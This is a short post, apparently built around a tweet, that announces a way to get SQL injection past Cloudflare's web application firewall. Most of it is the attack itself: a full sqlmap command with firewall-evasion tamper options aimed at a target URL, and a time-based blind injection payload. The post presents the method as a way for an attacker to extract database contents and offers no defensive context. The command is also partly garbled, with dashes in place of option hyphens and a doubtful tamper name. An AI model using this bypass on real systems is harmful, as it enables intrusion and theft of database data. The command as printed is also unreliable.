A SQL injection bypass for Cloudflare WAF was discovered using the payload: sqlmap -u "https://t.co/st5htQnPMW" –dbs –batch –time-sec 10 –level 3 –hex –random-agent –tamper=space2comment,betweeny. This bypass allows an attacker to extract database information. Further technical details can be found in the tweet: https://t.co/YAswXJRchB
Bypass waf for SQL injection 🙂
cloudflarecommand :
sqlmap -u "https://t.co/st5htQnPMW" –dbs –batch –time-sec 10 –level 3 –hex –random-agent –tamper=space2comment,betweeny
time-based blind:+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO) pic.twitter.com/YAswXJRchB
— ./Mr-Dark (@Mr_Dark55) January 26, 2025